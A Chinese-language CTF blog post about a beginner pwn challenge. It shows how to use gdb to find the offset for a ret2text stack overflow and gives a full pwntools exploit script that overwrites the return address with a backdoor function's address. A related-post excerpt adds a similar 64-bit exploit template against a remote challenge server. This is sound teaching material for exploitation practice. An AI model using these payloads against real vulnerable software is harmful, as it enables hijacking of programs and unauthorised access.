用gdb的动态视角看ret2text的实现

发表于2025-10-27|更新于2025-11-06|pwn入门

|总字数:180|阅读时长:1分钟|浏览量:

来看一道非常简单的栈溢出

后门函数地址ida里很明显，0x8048521

exp本身不难写,下面看一下怎么用gdb确定偏移

from pwn import*
io=process("./pwn")
#io=remote("pwn.challenge.ctf.show",28175);
gdb.attach(io,"b main") #在main函数下断点
payload=b"A"*(0x12+0x4)+p32(0x8048521)
io.sendline(payload)
io.interactive()

0xffffcfd8 是当前函数的栈底，指向的0xffffcfe8是上一个函数的栈底（old_ebp）

用0xffffcfd8减去0xffffcfc6得到0x12，这也就对上了ida里的偏移量

我们退出，输入fini直接运行完，可以看出已经覆盖了0x12+0x4个字节，并且我们的后门函数地址已经成功覆盖到了ebp下的返回地址

文章作者: JiuTian521

文章链接: https://jiutian521.github.io/posts/2ee84d32.html

ret2text

相关推荐

2025-10-24

ret2text小tips

exp模板 12345678910from pwn import *io = remote("39.106.48.123", 29826)payload = b"A"*264 + p64(0x401202)io.sendline(payload)io.interactive() 264即258+8，258是rbp的位置，ida里一般是16位，0x401202为后门函数入栈的地址注意：1.一定不要忘记加4/8个字节覆盖栈底寄存器 2.在64位程序中，如果不成功，可能是栈没有对齐，需要把后门函数的地址往后加两个单位

2025-11-25

初识gdb的使用与数组越界

开始做ISCTF的真题 girlfriend 题目难度：简单题目描述：你能记住你女朋友的生日嘛？首先先点评一下，出题人出这个题缝合了两个关卡，把栈溢出，ret2text和数组越界全都考察了一遍，我认为出的水平非常高，符合新生赛要求当然这么简单的一个题我居然想了一天，也确实是见识少了 123456789101112131415161718int __cdecl main(int argc, const char **argv, const char **envp){ char buf[40]; // [rsp+0h] [rbp-30h] BYREF char s1[8]; // [rsp+28h] [rbp-8h] BYREF init(argc, argv, envp); puts("welcome to isctf2024"); puts("first i need your team id"); read(0, buf, 0x30uLL); if ( strcmp(s1, "admin"...

数据加载中